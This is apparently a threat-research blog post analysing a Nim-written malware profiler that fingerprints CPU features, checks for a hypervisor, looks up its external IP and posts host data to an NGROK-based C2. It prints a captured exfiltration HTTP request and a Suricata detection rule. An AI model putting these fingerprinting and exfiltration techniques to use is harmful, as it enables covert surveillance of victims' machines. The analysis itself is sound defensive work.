By: Jason Reaves
Recently while working on Metastealer samples, we pivoted and ended up discovering a new piece of malware written in NIM. The sample appears to be a system profiler but also leverages NGROK for C2.
One of the first things done by this sample is performed inside the PreMainInner during the initialization portion of the executable, this has a very extensive function that will get the name of the CPU:
The values can be seen above that will be passed to the CPUID call which will then recover the processor brand string for values 0x80000002–0x80000004.
Recovering the brand string isn’t a new technique for malware but in this case the malware does begin enumerating a significant number of processor features by checking the extended processor information from CPUID via the 0x80000001 value. The first thing checked though is whether the hypervisor bit is set or not:
Next begins a large amount of checks against the processor feature bits:
The full list of features checked can be found below:
Most of these features that are checked then have a flag set inside the malware; however in the sample analyzed these flags are not actually leveraged at this time.
During the main portion of the malware, it will first utilize the icanhazip server to retrieve it’s external IP address:
After collecting all this data, it will be shipped off to the hardcoded C2 server:
The malware then sends off the bots external IP, host information and CPU information to the C2:
POST /sysvndump/send HTTP/1.1
content-type: multipart/form-data; boundary=4292486321577947087
user-agent: Nim httpclient/1.6.2
Content-Disposition: form-data; name="dump_text"
ICANHAZIP response: 220.127.116.11
\nHost OS: windows\nHost CPU: amd64\nCPU Name: Intel(R) Xeon(R) CPU @ 2.80GHz
HTTP/1.1 200 OK
Date: Wed, 19 Jan 2022 19:20:11 GMT
Lots of options for a network signature, the hardcoded data from our reversing work:
I honed in mostly on the generic portion of the Nim user-agent, the Content-Disposition value and the icanhazip response string:
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"NIM Profiler"; content:"Nim httpclient"; http_user_agent; content:"form-data|3b| name=|22|dump_text|22|"; http_client_body; content:"ICANHAZIP response"; http_client_body; sid:9000234; rev:1; metadata:author Jason Reaves;)